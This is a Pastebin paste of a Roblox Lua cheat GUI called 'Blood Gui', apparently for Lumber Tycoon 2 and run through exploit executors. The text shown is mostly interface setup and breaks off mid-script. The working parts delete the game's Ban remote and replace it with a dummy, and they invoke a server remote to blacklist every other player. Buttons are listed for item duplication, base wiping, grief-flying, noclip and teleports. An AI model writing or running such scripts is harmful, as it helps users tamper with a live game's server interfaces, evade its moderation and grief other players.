DurrK

Blood Gui (New)

Nov 11th, 2019
3,747
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 168.66 KB | None | 0 0
  1.  
  2. -- Objects
  3.  
  4. local Intro = Instance.new("ScreenGui")
  5. local IntroImage = Instance.new("ImageLabel")
  6. local _1 = Instance.new("TextLabel")
  7. local _2 = Instance.new("TextLabel")
  8. local _3 = Instance.new("TextLabel")
  9. local _4 = Instance.new("TextLabel")
  10. local _5 = Instance.new("TextLabel")
  11. local _6 = Instance.new("TextLabel")
  12. local _7 = Instance.new("TextLabel")
  13.  
  14. -- Properties
  15.  
  16. Intro.Name = "Intro"
  17. Intro.Parent = game.CoreGui
  18.  
  19. IntroImage.Name = "IntroImage"
  20. IntroImage.Parent = Intro
  21. IntroImage.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  22. IntroImage.BackgroundTransparency = 1
  23. IntroImage.BorderColor3 = Color3.new(1, 1, 1)
  24. IntroImage.BorderSizePixel = 0
  25. IntroImage.Position = UDim2.new(0.400, 0, 0.200, 0)
  26. IntroImage.Size = UDim2.new(0, 356, 0, 347)
  27. IntroImage.Image = "rbxassetid://1130382821"
  28.  
  29. _1.Name = "1"
  30. _1.Parent = IntroImage
  31. _1.BackgroundColor3 = Color3.fromRGB(249, 214, 46)
  32. _1.BackgroundTransparency = 1
  33. _1.BorderSizePixel = 0
  34. _1.Position = UDim2.new(0.109550565, 0, 0.423631132, 0)
  35. _1.Size = UDim2.new(0, 40, 0, 53)
  36. _1.Font = Enum.Font.ArialBold
  37. _1.FontSize = Enum.FontSize.Size14
  38. _1.Text = " "
  39. _1.TextColor3 = Color3.new(255, 0, 0)
  40. _1.TextScaled = true
  41. _1.TextSize = 14
  42. _1.TextWrapped = true
  43.  
  44. _2.Name = "2"
  45. _2.Parent = IntroImage
  46. _2.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  47. _2.BackgroundTransparency = 1
  48. _2.BorderSizePixel = 0
  49. _2.Position = UDim2.new(0.221910119, 0, 0.423631132, 0)
  50. _2.Size = UDim2.new(0, 40, 0, 53)
  51. _2.Font = Enum.Font.ArialBold
  52. _2.FontSize = Enum.FontSize.Size14
  53. _2.Text = "B"
  54. _2.TextColor3 = Color3.new(255, 0, 0)
  55. _2.TextScaled = true
  56. _2.TextSize = 14
  57. _2.TextWrapped = true
  58.  
  59. _3.Name = "3"
  60. _3.Parent = IntroImage
  61. _3.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  62. _3.BackgroundTransparency = 1
  63. _3.BorderSizePixel = 0
  64. _3.Position = UDim2.new(0.334269673, 0, 0.423631132, 0)
  65. _3.Size = UDim2.new(0, 40, 0, 53)
  66. _3.Font = Enum.Font.ArialBold
  67. _3.FontSize = Enum.FontSize.Size14
  68. _3.Text = "L"
  69. _3.TextColor3 = Color3.new(255, 0, 0)
  70. _3.TextScaled = true
  71. _3.TextSize = 14
  72. _3.TextWrapped = true
  73.  
  74. _4.Name = "4"
  75. _4.Parent = IntroImage
  76. _4.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  77. _4.BackgroundTransparency = 1
  78. _4.BorderSizePixel = 0
  79. _4.Position = UDim2.new(0.446629226, 0, 0.423631132, 0)
  80. _4.Size = UDim2.new(0, 40, 0, 53)
  81. _4.Font = Enum.Font.ArialBold
  82. _4.FontSize = Enum.FontSize.Size14
  83. _4.Text = "O"
  84. _4.TextColor3 = Color3.new(255, 0, 0)
  85. _4.TextScaled = true
  86. _4.TextSize = 14
  87. _4.TextWrapped = true
  88.  
  89. _5.Name = "5"
  90. _5.Parent = IntroImage
  91. _5.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  92. _5.BackgroundTransparency = 1
  93. _5.BorderSizePixel = 0
  94. _5.Position = UDim2.new(0.55898881, 0, 0.423631132, 0)
  95. _5.Size = UDim2.new(0, 40, 0, 53)
  96. _5.Font = Enum.Font.ArialBold
  97. _5.FontSize = Enum.FontSize.Size14
  98. _5.Text = "O"
  99. _5.TextColor3 = Color3.new(255, 0, 0)
  100. _5.TextScaled = true
  101. _5.TextSize = 14
  102. _5.TextWrapped = true
  103.  
  104. _6.Name = "6"
  105. _6.Parent = IntroImage
  106. _6.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  107. _6.BackgroundTransparency = 1
  108. _6.BorderSizePixel = 0
  109. _6.Position = UDim2.new(0.671348333, 0, 0.423631132, 0)
  110. _6.Size = UDim2.new(0, 40, 0, 53)
  111. _6.Font = Enum.Font.ArialBold
  112. _6.FontSize = Enum.FontSize.Size14
  113. _6.Text = "D"
  114. _6.TextColor3 = Color3.new(255, 0, 0)
  115. _6.TextScaled = true
  116. _6.TextSize = 14
  117. _6.TextWrapped = true
  118.  
  119. _7.Name = "7"
  120. _7.Parent = IntroImage
  121. _7.BackgroundColor3 = Color3.new(1, 1, 1)
  122. _7.BackgroundTransparency = 1
  123. _7.BorderSizePixel = 0
  124. _7.Position = UDim2.new(0.775280893, 0, 0.423631132, 0)
  125. _7.Size = UDim2.new(0, 40, 0, 53)
  126. _7.Font = Enum.Font.ArialBold
  127. _7.FontSize = Enum.FontSize.Size14
  128. _7.Text = " "
  129. _7.TextColor3 = Color3.new(255, 0, 0)
  130. _7.TextScaled = true
  131. _7.TextSize = 14
  132. _7.TextWrapped = true
  133.  
  134.  
  135.  
  136. _1.TextTransparency = 0.2
  137. wait()
  138. _2.TextTransparency = 0.2
  139. wait()
  140. _3.TextTransparency = 0.2
  141. wait()
  142. _4.TextTransparency = 0.2
  143. wait()
  144. _5.TextTransparency = 0.2
  145. wait()
  146. _6.TextTransparency = 0.2
  147. wait()
  148. _7.TextTransparency = 0.2
  149. wait()
  150. IntroImage.ImageTransparency = 0.2
  151. wait()
  152. _1.TextTransparency = 0.3
  153. wait()
  154. _2.TextTransparency = 0.3
  155. wait()
  156. _3.TextTransparency = 0.3
  157. wait()
  158. _4.TextTransparency = 0.3
  159. wait()
  160. _5.TextTransparency = 0.3
  161. wait()
  162. _6.TextTransparency = 0.3
  163. wait()
  164. _7.TextTransparency = 0.3
  165. wait()
  166. IntroImage.ImageTransparency = 0.3
  167. wait()
  168. _1.TextTransparency = 0.4
  169. wait()
  170. _2.TextTransparency = 0.4
  171. wait()
  172. _3.TextTransparency = 0.4
  173. wait()
  174. _4.TextTransparency = 0.4
  175. wait()
  176. _5.TextTransparency = 0.4
  177. wait()
  178. _6.TextTransparency = 0.4
  179. wait()
  180. _7.TextTransparency = 0.4
  181. wait()
  182. IntroImage.ImageTransparency = 0.4
  183. wait()
  184. _1.TextTransparency = 0.5
  185. wait()
  186. _2.TextTransparency = 0.5
  187. wait()
  188. _3.TextTransparency = 0.4
  189. wait()
  190. _4.TextTransparency = 0.5
  191. wait()
  192. _5.TextTransparency = 0.5
  193. wait()
  194. _6.TextTransparency = 0.5
  195. wait()
  196. _7.TextTransparency = 0.5
  197. wait()
  198. IntroImage.ImageTransparency = 0.5
  199. wait()
  200. _1.TextTransparency = 0.6
  201. wait()
  202. _2.TextTransparency = 0.6
  203. wait()
  204. _3.TextTransparency = 0.6
  205. wait()
  206. _4.TextTransparency = 0.6
  207. wait()
  208. _5.TextTransparency = 0.6
  209. wait()
  210. _6.TextTransparency = 0.6
  211. wait()
  212. _7.TextTransparency = 0.6
  213. wait()
  214. IntroImage.ImageTransparency = 0.6
  215. wait()
  216. _1.TextTransparency = 0.7
  217. wait()
  218. _2.TextTransparency = 0.7
  219. wait()
  220. _3.TextTransparency = 0.7
  221. wait()
  222. _4.TextTransparency = 0.7
  223. wait()
  224. _5.TextTransparency = 0.7
  225. wait()
  226. _6.TextTransparency = 0.7
  227. wait()
  228. _7.TextTransparency = 0.7
  229. wait()
  230. IntroImage.ImageTransparency = 0.7
  231. wait()
  232. _1.TextTransparency = 0.8
  233. wait()
  234. _2.TextTransparency = 0.8
  235. wait()
  236. _3.TextTransparency = 0.8
  237. wait()
  238. _4.TextTransparency = 0.8
  239. wait()
  240. _5.TextTransparency = 0.8
  241. wait()
  242. _6.TextTransparency = 0.8
  243. wait()
  244. _7.TextTransparency = 0.8
  245. wait()
  246. IntroImage.ImageTransparency = 0.8
  247. wait()
  248. _1.TextTransparency = 0.9
  249. wait()
  250. _2.TextTransparency = 0.9
  251. wait()
  252. _3.TextTransparency = 0.9
  253. wait()
  254. _4.TextTransparency = 0.9
  255. wait()
  256. _5.TextTransparency = 0.9
  257. wait()
  258. _6.TextTransparency = 0.9
  259. wait()
  260. _7.TextTransparency = 0.9
  261. wait()
  262. IntroImage.ImageTransparency = 0.9
  263. wait()
  264. _1.TextTransparency = 1
  265. wait()
  266. _2.TextTransparency = 1
  267. wait()
  268. _3.TextTransparency = 1
  269. wait()
  270. _4.TextTransparency = 1
  271. wait()
  272. _5.TextTransparency = 1
  273. wait()
  274. _6.TextTransparency = 1
  275. wait()
  276. _7.TextTransparency = 1
  277. wait()
  278. IntroImage.ImageTransparency = 0.9
  279. wait()
  280. _1.TextTransparency = 1.1
  281. wait()
  282. _2.TextTransparency = 1.1
  283. wait()
  284. _3.TextTransparency = 1.1
  285. wait()
  286. _4.TextTransparency = 1.1
  287. wait()
  288. _5.TextTransparency = 1.1
  289. wait()
  290. _6.TextTransparency = 1.1
  291. wait()
  292. _7.TextTransparency = 1.1
  293. wait()
  294. IntroImage.ImageTransparency = 5.1
  295. wait()
  296. Intro:Destroy()
  297. wait()
  298.  
  299. local s = Instance.new("Sound")
  300. s.Name = "Sound"
  301. s.SoundId = "http://www.roblox.com/asset/?id=2528420941"
  302. s.Volume = 0
  303. s.Looped = false
  304. s.archivable = false
  305. s.Parent = game.Workspace
  306. --Join
  307.  
  308. local k = Instance.new("Sound")
  309. k.Name = "Soundzz"
  310. k.SoundId = "http://www.roblox.com/asset/?id=305977837"
  311. k.Volume = 0
  312. k.Looped = false
  313. k.archivable = false
  314. k.Parent = game.Workspace
  315. --Left
  316.  
  317. local q = Instance.new("Sound")
  318. q.Name = "Soundzzzz"
  319. q.SoundId = "http://www.roblox.com/asset/?id=249869145"
  320. q.Volume = 0
  321. q.Looped = false
  322. q.archivable = false
  323. q.Parent = game.Workspace
  324. --Systems Online
  325.  
  326. local function SendNotification(title,text,duration,...)
  327. game.StarterGui:SetCore("SendNotification", {
  328. Title = title;
  329. Text = text;
  330. Icon = "";
  331. Duration = duration;
  332. })
  333. end
  334.  
  335. game.Players.ChildAdded:Connect(function(player)
  336. if not pcall (function()
  337. SendNotification("Player JOINED",""..player.Name.." has JOINED the game",5 )
  338. s:Play()
  339. end) then
  340. print ("Error")
  341. end
  342. end)
  343. ---------------------------------------------------------------------
  344. -- Same extra's apply down here as well.
  345.  
  346. game.Players.ChildRemoved:Connect(function(player)
  347. if not pcall (function()
  348. SendNotification("Player LEFT",""..player.Name.." has LEFT the game",4.4 )
  349. k:Play()
  350. end) then
  351. print ("Error")
  352. end
  353. end)
  354.  
  355. SendNotification("Loaded","Join and leave detector is loaded",2)
  356. q:Play()
  357.  
  358. -- Variables --
  359.  
  360. local Script = "BLOOD"
  361. local gFont = "SourceSans"
  362. local Visi = true
  363.  
  364. -- Functions --
  365.  
  366. function Log(text, r, g, b, font)
  367. game.StarterGui:SetCore("ChatMakeSystemMessage", {
  368. Text = "{" .. tostring(Script) .. "} - " .. text;
  369. Color = Color3.new(r, g, b);
  370. Font = Enum.Font[font];
  371. FontSize = Enum.FontSize.Size10;
  372. })
  373. end
  374. Log("Loading framework...", 255,0,0, tostring(gFont))
  375. ---------------------------------------------------------------------
  376.  
  377. -- Automatically Add players to Blacklist --
  378.  
  379. Mouse = game.Players.LocalPlayer:GetMouse()
  380.  
  381. game:service'ReplicatedStorage'.Interaction.Ban:Destroy()
  382. Instance.new('RemoteEvent', game:service'ReplicatedStorage'.Interaction).Name = "Ban"
  383.  
  384. Client = game.ReplicatedStorage.Interaction.ClientSetListPlayer
  385. players = game.Players
  386. for i, v in pairs(players:GetPlayers()) do
  387. if v.Name ~= players.LocalPlayer.Name then
  388. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, v, true)
  389. end
  390. end
  391. players.PlayerAdded:connect(function(plr)
  392. Client:InvokeServer(players.LocalPlayer.BlacklistFolder, plr, true)
  393. end)
  394.  
  395. game:GetService("StarterGui"):SetCore("SendNotification", {
  396. Title = "BLOOD",
  397. Text = "Loaded Successful."
  398. })
  399.  
  400. local players = game:GetService('Players')
  401. if game.Players.LocalPlayer then
  402. game.StarterGui:SetCore('SendNotification', {
  403. Title = ' '.. players.LocalPlayer.Name..'!',
  404. Text = 'Welcome to Bloods GUI!',
  405. Icon = [[http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&Format=Png&userName=]]..players.LocalPlayer.Name..[[&RAND]] .. math.random(1,10000000),
  406. Duration = 5,
  407. })
  408. end
  409.  
  410. ---------------------------------------------------------------------
  411. WCollide = "Nothing"
  412. afkactive = false
  413. CustomLocationSet = false
  414.  
  415.  
  416. BLOOD = Instance.new("ScreenGui")
  417. MainFrame = Instance.new("Frame")
  418. ImageLabel = Instance.new("ImageLabel")
  419. OpenFrame = Instance.new("Frame")
  420. Open = Instance.new("ImageButton")
  421. CloseBLOOD = Instance.new("TextButton")
  422. Minimize = Instance.new("TextButton")
  423. MenuFrame = Instance.new("Frame")
  424. MenuFramea = Instance.new("Frame")
  425. AIntroImage = Instance.new("ImageLabel")
  426. AIntroImage1 = Instance.new("ImageLabel")
  427. BloodFrameInfo = Instance.new("TextLabel")
  428. Picker = Instance.new("ScrollingFrame")
  429. AIntroImage = Instance.new("ImageButton")
  430. ChangeItem = Instance.new("Frame")
  431. CurrentItem = Instance.new("ImageButton")
  432. LT2GUI2Frame = Instance.new("Frame")
  433. Btoolamenu = Instance.new("ImageButton")
  434. FunStuffHOVER = Instance.new("TextButton")
  435. FunStuffTHOMAS = Instance.new("TextButton")
  436. FunStuffPOLICE = Instance.new("TextButton")
  437. FunStuffSPRAY = Instance.new("TextButton")
  438. FunStuffCOCA = Instance.new("TextButton")
  439. FunStuffLEAKED = Instance.new("TextButton")
  440. FunStuffFLASH = Instance.new("TextButton")
  441. DeleteTool = Instance.new("TextButton")
  442. CopyTool = Instance.new("TextButton")
  443. MoveTool = Instance.new("TextButton")
  444. BuyFrame = Instance.new("Frame")
  445. Buymenu = Instance.new("ImageButton")
  446. bcps = Instance.new("TextButton")
  447. fshop = Instance.new("TextButton")
  448. wrus = Instance.new("TextButton")
  449. bp = Instance.new("TextButton")
  450. ls = Instance.new("TextButton")
  451. Halloween = Instance.new("TextButton")
  452. toolaFrame = Instance.new("Frame")
  453. toolamenu = Instance.new("ImageButton")
  454. WalkspeedLabel = Instance.new("TextButton")
  455. JumpText = Instance.new("TextBox")
  456. WalkSpeed = Instance.new("TextLabel")
  457. JumpPower = Instance.new("TextButton")
  458. AntiBlack = Instance.new("TextButton")
  459. GriefFly = Instance.new("TextButton")
  460. StopGriefFly = Instance.new("TextButton")
  461. Fly = Instance.new("TextButton")
  462. PinkWires = Instance.new("TextButton")
  463. WaterCollide = Instance.new("TextButton")
  464. ClickTP = Instance.new("TextButton")
  465. Noclip = Instance.new("TextButton")
  466. AntiAFK = Instance.new("TextButton")
  467. AntiAFKtime = Instance.new("TextLabel")
  468. Fog = Instance.new("TextButton")
  469. CARA = Instance.new("TextButton")
  470. CARAs = Instance.new("TextBox")
  471. RemoveT = Instance.new("TextButton")
  472. Brid = Instance.new("TextLabel")
  473. BridDown = Instance.new("TextButton")
  474. Bridup = Instance.new("TextButton")
  475. ReJoinServer = Instance.new("TextButton")
  476. Reset = Instance.new("TextButton")
  477. WipeBase = Instance.new("TextButton")
  478. MaxLand = Instance.new("TextButton")
  479. BluePrints = Instance.new("TextButton")
  480. Landart = Instance.new("TextButton")
  481. Hoofer = Instance.new("TextButton")
  482. TripleWalls = Instance.new("TextButton")
  483. DoubleWalls = Instance.new("TextButton")
  484. SingleWalls = Instance.new("TextButton")
  485. BaseFLOOR = Instance.new("TextButton")
  486. PaintFill = Instance.new("TextButton")
  487. ArtFrame = Instance.new("Frame")
  488. Artmenu = Instance.new("ImageButton")
  489. Paint = Instance.new("TextButton")
  490. Slot = Instance.new("TextBox")
  491. DMoney = Instance.new("TextButton")
  492. Load = Instance.new("TextButton")
  493. Store = Instance.new("TextButton")
  494. Restore = Instance.new("TextButton")
  495. SaveSlot = Instance.new("TextButton")
  496. DropAxes = Instance.new("TextButton")
  497. CountAxes = Instance.new("TextButton")
  498. GetWires = Instance.new("TextButton")
  499. GetVehicle = Instance.new("TextButton")
  500. GetFurniture = Instance.new("TextButton")
  501. GetStructure = Instance.new("TextButton")
  502. GetGifts = Instance.new("TextButton")
  503. GetAxes = Instance.new("TextButton")
  504. GetItems = Instance.new("TextButton")
  505. GetWood = Instance.new("TextButton")
  506. ItemDupe = Instance.new("TextButton")
  507. CopyBase = Instance.new("TextButton")
  508. AXETRUCK = Instance.new("TextButton")
  509. WireObjects = Instance.new("TextButton")
  510. giftsport = Instance.new("TextButton")
  511. HardStructures = Instance.new("TextButton")
  512. other = Instance.new("TextButton")
  513. other1 = Instance.new("TextButton")
  514. TPtreesPlanks = Instance.new("TextButton")
  515. PlayerNameBox = Instance.new("TextBox")
  516. CopyFrame = Instance.new("Frame")
  517. Copymenu = Instance.new("ImageButton")
  518. Treeaura = Instance.new("TextButton")
  519. Tptree = Instance.new("TextButton")
  520. TptreeFrame = Instance.new("Frame")
  521. Type = Instance.new("TextBox")
  522. TpAllPlanks = Instance.new("TextButton")
  523. TPWood = Instance.new("TextButton")
  524. SellPlanks = Instance.new("TextButton")
  525. SellWood = Instance.new("TextButton")
  526. Harddrag = Instance.new("TextButton")
  527. Goldaxe = Instance.new("TextButton")
  528. WoodFrame = Instance.new("Frame")
  529. Woodmenu = Instance.new("ImageButton")
  530. SawmillTp = Instance.new("TextButton")
  531. Waypoints = Instance.new("ScrollingFrame")
  532. Stranger = Instance.new("TextButton")
  533. BobsShack = Instance.new("TextButton")
  534. PlotTp = Instance.new("TextButton")
  535. FancyFurnishings = Instance.new("TextButton")
  536. FineArtsShop = Instance.new("TextButton")
  537. LinksLogic = Instance.new("TextButton")
  538. SpawnPoint = Instance.new("TextButton")
  539. Dock = Instance.new("TextButton")
  540. Bridge = Instance.new("TextButton")
  541. ShrineOfSight = Instance.new("TextButton")
  542. TheDen = Instance.new("TextButton")
  543. VolcanoWin = Instance.new("TextButton")
  544. SkiLodge = Instance.new("TextButton")
  545. ShowLocation = Instance.new("TextButton")
  546. CustomTPPoint = Instance.new("TextButton")
  547. Teleport = Instance.new("ImageButton")
  548. PlayerFrame = Instance.new("Frame")
  549. Player1 = Instance.new("TextButton")
  550. Player2 = Instance.new("TextButton")
  551. Player3 = Instance.new("TextButton")
  552. Player4 = Instance.new("TextButton")
  553. Player5 = Instance.new("TextButton")
  554. Player6 = Instance.new("TextButton")
  555. PlyrSel = Instance.new("TextLabel")
  556. TpPlayer = Instance.new("TextButton")
  557. TpBase = Instance.new("TextButton")
  558. Player = Instance.new("ImageButton")
  559. Depart = Instance.new("TextLabel")
  560. Paintingf = Instance.new("TextButton")
  561. InfoText1 = Instance.new("TextLabel")
  562. BigPlank = Instance.new("TextButton")
  563. BirchTree = Instance.new("ImageButton")
  564. CavecrawlerTree = Instance.new("ImageButton")
  565. CherryTree = Instance.new("ImageButton")
  566. ElmTree = Instance.new("ImageButton")
  567. FirTree = Instance.new("ImageButton")
  568. Frosttree = Instance.new("ImageButton")
  569. GenericTree = Instance.new("ImageButton")
  570. GoldTree = Instance.new("ImageButton")
  571. KoaTree = Instance.new("ImageButton")
  572. LavaTree = Instance.new("ImageButton")
  573. PalmTree = Instance.new("ImageButton")
  574. PhantomTree = Instance.new("ImageButton")
  575. PineTree = Instance.new("ImageButton")
  576. SinisterGlow = Instance.new("ImageButton")
  577. Snowglowtree = Instance.new("ImageButton")
  578. Spooktree = Instance.new("ImageButton")
  579. WalnutTree = Instance.new("ImageButton")
  580. ZombieTree = Instance.new("ImageButton")
  581. TpCar = Instance.new("TextButton")
  582. TpCarFrame = Instance.new("Frame")
  583. SpawnPointa = Instance.new("TextButton")
  584. furnabox = Instance.new("TextButton")
  585. LinkLogic = Instance.new("TextButton")
  586. Bshack = Instance.new("TextButton")
  587. Docka = Instance.new("TextButton")
  588. FineShop = Instance.new("TextButton")
  589. Deny = Instance.new("TextButton")
  590. OfSight = Instance.new("TextButton")
  591. SKI = Instance.new("TextButton")
  592. LightHouse = Instance.new("TextButton")
  593. LavaTreeA = Instance.new("TextButton")
  594. PalmTreeA = Instance.new("TextButton")
  595. SnowglowtreeA = Instance.new("TextButton")
  596. GoldTreeA = Instance.new("TextButton")
  597. CarRotate = Instance.new("TextButton")
  598. CarRotates = Instance.new("TextButton")
  599.  
  600. --Properties:
  601. BLOOD.Name = "BLOOD"
  602. BLOOD.Parent = game.CoreGui
  603.  
  604. OpenFrame.Name = "OpenFrame"
  605. OpenFrame.Parent = BLOOD
  606. OpenFrame.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  607. OpenFrame.BorderColor3 = Color3.fromRGB(196, 40, 28)
  608. OpenFrame.Position = UDim2.new(0.5, -40, 0, -28)
  609. OpenFrame.Size = UDim2.new(0, 80, 0, 20)
  610.  
  611. Open.Name = "Open"
  612. Open.Parent = OpenFrame
  613. Open.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
  614. Open.BorderColor3 = Color3.fromRGB(196, 40, 28)
  615. Open.Size = UDim2.new(0, 80, 0, 20)
  616. Open.Image = "rbxassetid://3630810430"
  617. Open.Selectable = true
  618.  
  619. Open.MouseEnter:connect(function()
  620. InfoText1.Visible = true
  621. end)
  622.  
  623. Open.MouseLeave:connect(function()
  624. InfoText1.Visible = false
  625. end)
  626.  
  627. InfoText1.Name = "InfoText1"
  628. InfoText1.Parent = OpenFrame
  629. InfoText1.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  630. InfoText1.BorderColor3 = Color3.new(0, 0, 0)
  631. InfoText1.BackgroundTransparency = 0.5
  632. InfoText1.Position = UDim2.new(0, -50, 0, 80)
  633. InfoText1.Size = UDim2.new(0, 190, 0, 130)
  634. InfoText1.TextColor3 = Color3.new(1, 1, 1)
  635. InfoText1.Font = Enum.Font.Fantasy
  636. InfoText1.Text = "This Gui was created by Oddy\n\nCredits:\n\nJohiro for the original scripts and fixing some broken ones. Big thanks to DIRT Gui for swapping scripts"
  637. InfoText1.TextSize = 15
  638. InfoText1.TextWrapped = true
  639. InfoText1.Visible = false
  640. InfoText1.ZIndex = 7
  641. InfoText1.TextYAlignment = Enum.TextYAlignment.Top
  642.  
  643. MainFrame.Name = "MainFrame"
  644. MainFrame.Parent = BLOOD
  645. MainFrame.Active = true
  646. MainFrame.Draggable = true
  647. MainFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  648. MainFrame.Position = UDim2.new(0.0111675123, 0, 0.436827958, 0)
  649. MainFrame.Selectable = true
  650. MainFrame.Size = UDim2.new(0, 500, 0, 500)
  651. MainFrame.Visible = false
  652.  
  653. ImageLabel.Name = "ImageLabel"
  654. ImageLabel.Parent = MainFrame
  655. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  656. ImageLabel.Position = UDim2.new(-0.000475523295, 0, -0.00117481197, 0)
  657. ImageLabel.Size = UDim2.new(0, 500, 0, 500)
  658. ImageLabel.Image = "rbxassetid://3883502641"
  659.  
  660. CloseBLOOD.Name = "CloseBLOOD"
  661. CloseBLOOD.Parent = MainFrame
  662. CloseBLOOD.BackgroundColor3 = Color3.new(0, 0, 0)
  663. CloseBLOOD.BorderColor3 = Color3.fromRGB(196, 40, 28)
  664. CloseBLOOD.Position = UDim2.new(0, 5, 0, 5)
  665. CloseBLOOD.Size = UDim2.new(0, 20, 0, 20)
  666. CloseBLOOD.Font = Enum.Font.Fantasy
  667. CloseBLOOD.FontSize = Enum.FontSize.Size18
  668. CloseBLOOD.Text = "X"
  669. CloseBLOOD.TextColor3 = Color3.new(1, 1, 1)
  670. CloseBLOOD.TextScaled = true
  671. CloseBLOOD.TextWrapped = true
  672. CloseBLOOD.TextSize = 17
  673.  
  674. Minimize.Name = "Minimize"
  675. Minimize.Parent = MainFrame
  676. Minimize.BackgroundColor3 = Color3.new(0, 0, 0)
  677. Minimize.BorderColor3 = Color3.fromRGB(196, 40, 28)
  678. Minimize.Position = UDim2.new(0, 26, 0, 5)
  679. Minimize.Size = UDim2.new(0, 20, 0, 20)
  680. Minimize.Font = Enum.Font.Fantasy
  681. Minimize.FontSize = Enum.FontSize.Size18
  682. Minimize.Text = "-"
  683. Minimize.TextColor3 = Color3.new(1, 1, 1)
  684. Minimize.TextScaled = true
  685. Minimize.TextWrapped = true
  686. Minimize.TextSize = 17
  687.  
  688. MenuFrame.Name = "MenuFrame"
  689. MenuFrame.Parent = MainFrame
  690. MenuFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  691. MenuFrame.BackgroundTransparency = 1
  692. MenuFrame.BorderColor3 = Color3.new(0, 1, 0)
  693. MenuFrame.Position = UDim2.new(0, 5, 0, 30)
  694. MenuFrame.Size = UDim2.new(0, 170, 0,400)
  695.  
  696. MenuFramea.Name = "MenuFrame"
  697. MenuFramea.Parent = MainFrame
  698. MenuFramea.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  699. MenuFramea.BackgroundTransparency = 1
  700. MenuFramea.BorderColor3 = Color3.new(0, 1, 0)
  701. MenuFramea.Position = UDim2.new(0, 270, 0, 140)
  702. MenuFramea.Size = UDim2.new(0, 120, 0,350)
  703.  
  704. AIntroImage.Name = "IntroImage"
  705. AIntroImage.Parent = MainFrame
  706. AIntroImage.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  707. AIntroImage.BackgroundTransparency = 1
  708. AIntroImage.BorderColor3 = Color3.new(1, 1, 1)
  709. AIntroImage.BorderSizePixel = 0
  710. AIntroImage.Position = UDim2.new(0, 10, 0, 335)
  711. AIntroImage.Size = UDim2.new(0, 120, 0, 30)
  712. AIntroImage.Image = "rbxassetid://3630810430"
  713. AIntroImage.Visible = true
  714.  
  715. AIntroImage1.Name = "IntroImage"
  716. AIntroImage1.Parent = MainFrame
  717. AIntroImage1.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  718. AIntroImage1.BackgroundTransparency = 1
  719. AIntroImage1.BorderColor3 = Color3.new(1, 1, 1)
  720. AIntroImage1.BorderSizePixel = 0
  721. AIntroImage1.Position = UDim2.new(0, 10, 0, 370)
  722. AIntroImage1.Size = UDim2.new(0, 120, 0, 120)
  723. AIntroImage1.Image = "rbxassetid://3940167130"
  724. AIntroImage1.Visible = true
  725.  
  726. BloodFrameInfo.Name = "BloodFrameInfo"
  727. BloodFrameInfo.Parent = MenuFrame
  728. BloodFrameInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  729. BloodFrameInfo.BackgroundTransparency = 1
  730. BloodFrameInfo.Position = UDim2.new(0, 3, 0, 3)
  731. BloodFrameInfo.Size = UDim2.new(0, 164, 0, 310)
  732. BloodFrameInfo.Font = Enum.Font.Fantasy
  733. BloodFrameInfo.FontSize = Enum.FontSize.Size14
  734. BloodFrameInfo.Text = "A NEW ITEM PINK CAR SPAWNER .\n\nFIX will now run on most executers, (AUTOBUY will not work on some).\n\nNew menus Paint tool, Paint Fill and Single Item Port,\n\nNew Port to tree menu.\n\nA BIG THANKS TO JOHIRO FOR WORKING ON THE NEW SCRIPTS.\n\nScripts may LAG and big so give time to load."
  735. BloodFrameInfo.TextColor3 = Color3.new(0, 0, 0)
  736. BloodFrameInfo.TextWrapped = true
  737. BloodFrameInfo.TextSize = 14
  738. BloodFrameInfo.Visible = true
  739. Log("Loaded framework successfully!", 0,255,255, tostring(gFont))
  740.  
  741.  
  742. Depart.Name = "Depart"
  743. Depart.Parent = MainFrame
  744. Depart.BackgroundColor3 = Color3.new(0, 0.298039, 0.498039)
  745. Depart.BorderColor3 = Color3.new(0, 0, 0)
  746. Depart.BorderSizePixel = 2
  747. Depart.Position = UDim2.new(0, 50, 0, 5)
  748. Depart.Size = UDim2.new(0, 130, 0, 20)
  749. Depart.BackgroundTransparency=1
  750. Depart.Font = Enum.Font.Fantasy
  751. Depart.FontSize = Enum.FontSize.Size18
  752. Depart.Text = "Ferry Departs: 0"
  753. Depart.TextColor3 = Color3.new(1, 1, 1)
  754. Depart.TextSize = 15
  755. Depart.TextStrokeColor3 = Color3.new(1, 1, 1)
  756. Depart.TextWrapped = true
  757.  
  758. game.Workspace.Ferry.TimeToDeparture.Changed:connect(function()
  759. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  760. if Depart.Text == "Ferry Departs: 0" then
  761. wait(6)
  762. Depart.Text = "Ferry has Departed"
  763. else
  764. Depart.Text = "Ferry Departs: ".. game.Workspace.Ferry.TimeToDeparture.Value
  765. end
  766. end)
  767.  
  768. ChangeItem.Name = "ChangeItem"
  769. ChangeItem.Parent = MainFrame
  770. ChangeItem.BackgroundColor3 = Color3.fromRGB(193, 40, 28)
  771. ChangeItem.BorderColor3 = Color3.new(0, 0, 0)
  772. ChangeItem.BorderSizePixel = 2
  773. ChangeItem.Position = UDim2.new(0, 390, 1, -110)
  774. ChangeItem.Size = UDim2.new(0, 100, 0, 100)
  775. ChangeItem.ZIndex = 2
  776.  
  777. CurrentItem.Name = "CurrentItem"
  778. CurrentItem.Parent = ChangeItem
  779. CurrentItem.BackgroundColor3 = Color3.new(1, 1, 1)
  780. CurrentItem.BorderColor3 = Color3.new(0, 0, 0)
  781. CurrentItem.BorderSizePixel = 2
  782. CurrentItem.Position = UDim2.new(0, 10, 0, 10)
